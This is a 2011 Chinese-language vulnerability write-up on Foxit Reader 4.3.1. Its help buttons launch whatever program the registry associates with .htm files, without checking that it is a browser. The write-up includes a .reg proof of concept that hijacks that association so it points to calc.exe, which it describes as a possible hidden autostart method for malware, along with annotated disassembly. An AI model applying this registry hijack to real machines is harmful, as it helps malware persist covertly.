_ _ (_) | | __ ____ __ _ _ _ _ __ ___ _ __ _ __ ___ | |_ \ \ / /\ \/ /| || | | || '_ ` _ \ | '_ \ | '_ \ / _ \| __| \ V / > < | || |_| || | | | | || |_) |_ | | | || __/| |_ \_/ /_/\_\| | \__,_||_| |_| |_|| .__/(_)|_| |_| \___| \__| _/ | | | |__/ |_| /---------------------------------------------------------------------------------------\ |>...................[ foxit Reader可被利用的vulnerability bug ]...................<| |>......................[ by nEINEI/vxjump.net ]......................<| |>......................[ 2011-05-23 ]......................<| \>...................... [ neineit_at_gmail.com ] .......................用户命令|在线技术支持|福昕软件主页,几处按钮功能未验证要打开 的pdf,htm文件是否对应关联为浏览器程序,导致可能存在功能失效。不加载pdf文档则情况上述情况无效。 漏洞利用: 不管用户机器上是否存在相关联的htm程序,都创建一个MyUltralEdit.htm项。 类似如下情况 Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.htm] @="MyUltralEdit.htm" "Content Type"="text/html" "PerceivedType"="text" [HKEY_CLASSES_ROOT\MyUltralEdit.htm\shell\open\command] @="\"c:\\Vuln\\calc.exe\" \"%1\"" 当执行上述操作时,foxit Reader将创建calc.exe进程。这样存在被恶意程序利用的可能做为隐藏的一种自启动方式。 代码分析: foxit readervV4.3.1.0118 006715D0 6A FF push -0x1 006715D2 68 B0ED9E00 push Foxit_Re.009EEDB0 006715D7 64:A1 00000000 mov eax,dword ptr fs:[0] 006715DD 50 push eax 006715DE 64:8925 0000000>mov dword ptr fs:[0],esp 006715E5 83EC 5C sub esp,0x5C 006715E8 A1 7879BF00 mov eax,dword ptr ds:[0xBF7978] 006715ED 56 push esi 006715EE 57 push edi 006715EF 894424 0C mov dword ptr ss:[esp+0xC],eax 006715F3 C74424 6C 00000>mov dword ptr ss:[esp+0x6C],0x0 006715FB 894424 08 mov dword ptr ss:[esp+0x8],eax 006715FF 8BB424 80000000 mov esi,dword ptr ss:[esp+0x80] //打开浏览器的类型,此时为1,表示用RegQueryValue + CreateProcess 方式 00671606 C64424 6C 01 mov byte ptr ss:[esp+0x6C],0x1 //否则用ShellExecuteW 方式 0067160B 85F6 test esi,esi 0067160D /75 20 jnz XFoxit_Re.0067162F //跳到0067162F 0067160F |8B4424 7C mov eax,dword ptr ss:[esp+0x7C] 00671613 |8B4C24 78 mov ecx,dword ptr ss:[esp+0x78] 00671617 |8B5424 74 mov edx,dword ptr ss:[esp+0x74] 0067161B |50 push eax 0067161C |56 push esi 0067161D |56 push esi 0067161E |51 push ecx 0067161F |68 D860B800 push Foxit_Re.00B860D8 ; UNICODE "open" 00671624 |52 push edx 00671625 |FF15 D006D900 call dword ptr ds:[<&SHELL32.ShellExecut>; SHELL32.ShellExecuteW 0067162B |8BF8 mov edi,eax 0067162D |EB 04 jmp XFoxit_Re.00671633 0067162F \8B7C24 78 mov edi,dword ptr ss:[esp+0x78] //接上面,运行到这里 //执行一个连接地址 "http://cdn02.foxitsoftware.com/pub/foxit/manual/chs/FoxitReader43_Manual.pdf" 00671633 83FF 20 cmp edi,0x20 00671636 76 09 jbe XFoxit_Re.00671641 00671638 83FE 01 cmp esi,0x1 0067163B 0F85 9C010000 jnz Foxit_Re.006717DD 00671641 68 04010000 push 0x104 00671646 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 0067164A E8 C0F83200 call Foxit_Re.009A0F0F 0067164F 50 push eax 00671650 68 1409C200 push Foxit_Re.00C20914 ; UNICODE ".htm" 00671655 68 00000080 push 0x80000000 0067165A E8 E1FCFFFF call Foxit_Re.00671340 // RegQueryValue 得到"MyUltraEdit.htm" 0067165F 83C4 0C add esp,0xC 00671662 85C0 test eax,eax 00671664 0F85 73010000 jnz Foxit_Re.006717DD 0067166A 6A FF push -0x1 0067166C 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 00671670 E8 EAF83200 call Foxit_Re.009A0F5F 00671675 68 2CC7B800 push Foxit_Re.00B8C72C ; UNICODE "\shell\open\command" 0067167A 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 0067167E E8 38F83200 call Foxit_Re.009A0EBB 00671683 8B4424 0C mov eax,dword ptr ss:[esp+0xC] 00671687 68 04010000 push 0x104 0067168C 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 00671690 8B70 F8 mov esi,dword ptr ds:[eax-0x8] 00671693 E8 77F83200 call Foxit_Re.009A0F0F // 拼接"MyUltraEdit.htm\shell\open\command" 00671698 50 push eax 00671699 56 push esi 0067169A 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] 0067169E E8 6CF83200 call Foxit_Re.009A0F0F 006716A3 50 push eax 006716A4 68 00000080 push 0x80000000 006716A9 E8 92FCFFFF call Foxit_Re.00671340 // 获得对应关联文件""C:\vuln\calc.exe" "%1"" 006716AE 83C4 0C add esp,0xC 006716B1 85C0 test eax,eax 006716B3 0F85 24010000 jnz Foxit_Re.006717DD 006716B9 6A FF push -0x1 006716BB 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 006716BF E8 9BF83200 call Foxit_Re.009A0F5F 006716C4 6A FF push -0x1 006716C6 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 006716CA E8 90F83200 call Foxit_Re.009A0F5F 006716CF 68 2CDFB800 push Foxit_Re.00B8DF2C ; UNICODE ""%1"" 006716D4 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 006716D8 E8 916E3200 call Foxit_Re.0099856E 006716DD 83F8 FF cmp eax,-0x1 006716E0 74 2F je XFoxit_Re.00671711 006716E2 8D8C24 80000000 lea ecx,dword ptr ss:[esp+0x80] 006716E9 50 push eax 006716EA 51 push ecx 006716EB 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 006716EF E8 E06D3200 call Foxit_Re.009984D4 006716F4 50 push eax 006716F5 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 006716F9 C64424 70 02 mov byte ptr ss:[esp+0x70],0x2 006716FE E8 0EF53200 call Foxit_Re.009A0C11 00671703 C64424 6C 01 mov byte ptr ss:[esp+0x6C],0x1 00671708 8D8C24 80000000 lea ecx,dword ptr ss:[esp+0x80] 0067170F EB 40 jmp XFoxit_Re.00671751 00671711 68 24DFB800 push Foxit_Re.00B8DF24 ; UNICODE "%1" 00671716 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 0067171A E8 4F6E3200 call Foxit_Re.0099856E 0067171F 83F8 FF cmp eax,-0x1 00671722 74 32 je XFoxit_Re.00671756 00671724 8D9424 80000000 lea edx,dword ptr ss:[esp+0x80] 0067172B 50 push eax 0067172C 52 push edx 0067172D 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 00671731 E8 9E6D3200 call Foxit_Re.009984D4 00671736 50 push eax 00671737 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 0067173B C64424 70 03 mov byte ptr ss:[esp+0x70],0x3 00671740 E8 CCF43200 call Foxit_Re.009A0C11 00671745 C64424 6C 01 mov byte ptr ss:[esp+0x6C],0x1 0067174A 8D8C24 80000000 lea ecx,dword ptr ss:[esp+0x80] 00671751 E8 74F33200 call Foxit_Re.009A0ACA 00671756 68 0C60B800 push Foxit_Re.00B8600C 0067175B 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 0067175F E8 57F73200 call Foxit_Re.009A0EBB 00671764 8B4424 78 mov eax,dword ptr ss:[esp+0x78] 00671768 8D4C24 08 lea ecx,dword ptr ss:[esp+0x8] 0067176C 50 push eax 0067176D E8 49F73200 call Foxit_Re.009A0EBB 00671772 B9 11000000 mov ecx,0x11 00671777 33C0 xor eax,eax 00671779 8D7C24 20 lea edi,dword ptr ss:[esp+0x20] 0067177D 8D5424 20 lea edx,dword ptr ss:[esp+0x20] 00671781 F3:AB rep stos dword ptr es:[edi] 00671783 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] 00671787 C74424 20 44000>mov dword ptr ss:[esp+0x20],0x44 // 未做是否为浏览器程序的验证,直接创建进程calc.exe,参数"http://cdn02.foxitsoftware.com/pub/foxit/manual/chs/FoxitReader43_Manual.pdf" //""C:\vuln\calc.exe" http://cdn02.foxitsoftware.com/pub/foxit/manual/chs/FoxitReader43_Manual.pdf" 0067178F 51 push ecx 00671790 52 push edx 00671791 50 push eax 00671792 50 push eax 00671793 50 push eax 00671794 50 push eax 00671795 50 push eax 00671796 50 push eax 00671797 8B4424 28 mov eax,dword ptr ss:[esp+0x28] 0067179B 50 push eax 0067179C 6A 00 push 0x0 0067179E FF15 1805D900 call dword ptr ds:[<&KERNEL32.CreateProc>; kernel32.CreateProcessW //在文档中包含超链接的情况,高版本的foxit reader不存在被利用的可能,adobe reader暂无此方面问题。